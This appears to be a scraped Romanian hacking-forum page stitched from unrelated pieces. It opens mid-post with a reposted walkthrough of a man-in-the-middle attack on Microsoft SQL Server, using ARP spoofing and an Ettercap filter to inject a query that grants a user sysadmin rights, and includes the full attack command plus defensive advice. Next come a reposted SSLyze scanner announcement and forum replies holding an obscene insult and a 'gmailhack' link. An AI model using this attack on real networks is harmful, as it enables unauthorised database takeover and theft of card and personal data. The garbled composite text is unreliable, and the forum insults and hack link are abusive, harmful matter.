script automates the entire process from converting the SQL queries to hex all the way to performing the ARP spoofing and loading the Ettercap filter. It makes the process extremely easy. In order to use the script you need four pieces of information. The IP address of the MSSQL server The IP address of the MSSQL client The original query you want to replace The new query you want to inject In this case, I already knew everything except for the SQL query I wanted to inject. I knew I wanted to give the anitian user sysadmin privileges. After a quick lesson in SQL commands, I was able to design with the correct query: ALTER SERVER ROLE sysadmin ADD MEMBER anitian; This would add my new anitian user to the sysadmin role on the server, giving me access to pretty much anything I want. Now that I had all four key pieces of information, I ran the script like this: ./SQLInject.sh –o “select ProductID, ProductName from Products where ProductID=1;” –i “ALTER SERVER ROLE sysadmin ADD MEMBER anitian;” –s 192.168.1.114 –c 192.168.1.100 –f mssql.filter Using the script, I do not have to worry about those pesky hex conversions or null bytes. The script handles it all for me. It will perform the conversions and then output an Ettercap filter to mssql.filter (The filename is based on the –f flag). From there, it runs etterfilter and compiles the filter into mssql.filter.ef. Finally, the script even loads up the command line interface to Ettercap, performs the ARP spoofing attack against the server and workstation and loads the filter! It will even compare the length of the old query and the new query and warn you if the new query is too long. And if the queries are not an identical length, it will pad the new one with spaces to make them identical in length! One single command does everything for me. I executed the script and then switched over to the workstation. I then ran the familiar select query and noticed that I once again received the “Command(s) completed successfully” message. This was a good sign for the attack. I logged out of the SA account and logged back in as anitian. Ta da! You can see in the screenshot that the anitian account is now a sysadmin user. With this level of access I can do whatever I want with the system. It gives me a great pivot point to start attacking other systems on the network. Of course, that assumes this database does not already contain what I am looking for like payment card numbers or personally identifiable information. The biggest downfall to this script is that it requires you to know the original SQL query before it actually happens. Luckily, SQL servers often have batch jobs or queries that are executed regularly or on a set schedule. Watching a Wireshark capture over a period of time should result in at least one query you can target. Of course I could always turn this into a more full-fledged program that performs the MITM attack on its own and then actually proxies the traffic, searching for TDS query packets by type and then automatically replacing the data without the need to know the original query beforehand…but that’s a project for another day. Defending Against SQL MITM Attacks Man in the middle attacks such as this can be devastating. As you can see, I was able to gain complete access to a critical system. A focused hacker may not follow some of the scientific processes I did. Moreover, they could automate this and do it repetitively for hours or days, waiting for just the right conditions. The simplest way to prevent this attack is to require encryption on all database connections. However, merely enabling encryption might not be sufficient. Clients can negotiate the connection with no encryption if it is not required. Also ensure that you use a valid, trusted certificate. An attacker could easily spoof a self-signed certificate. Another defense is to ensure remote queries never use accounts with elevated privileges, such as the SA account. All database queries, especially the programmatic ones, should use an account with the absolute least amount of access they need to do the job. This ensures that if the attacker is able to take over a connection, they cannot use that connection to forge accounts, like I did in this test. Lastly, ensure your infrastructure is patched regularly. Also, segment and isolate database systems from the corporate network. These are best practices that also make MITM type attacks very difficult (if not impossible) to execute. Sursa: https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/

FAST FULL-FEATURED SSL SCANNER Posted on 10/02/2016, 13:06 By Johnny Cash SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Key features Multi-processed and multi-threaded scanning: it’s very fast. Support for all SSL protocols, from SSL 2.0 to TLS 1.2. SSLyze can also be used as a library, in order to run scans and process the results directly from Python. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP. Support for client certificates when scanning servers that perform mutual authentication. Installation SSLyze can be installed directly via pip: pip install sslyze or git clone https://github.com/nabla-c0d3/sslyze /opt/sslyze cd /opt/sslyze pip install -r requirements.txt --target ./lib Usage python sslyze_cli.py –regular www.yahoo.com:443 www.google.com Platforms SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan. Sursa: http://securityblog.gr/3267/fast-full-featured-ssl-scanner/

D?-o-n mor?ii ei de treab?! Ce mari hackeri vre?i voi s? deveni?i dac? nu sunte?i în stare s? decoda?i un 46esab? V? trebuie mult mai mult? ambi?ie ?i studiu individual.

1. De unde ai copiat prostia asta? 2. Unixcod-ul e vechi rau 3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici 4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100% 5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16

vreau s-o fut pe ma-ta, ofer juma de camera d-aia

Bun venit! OFF// SQRT vine de la squirt?

Scuze de intarziere. @hapy.end vezi aici: http://x.co/gmailhack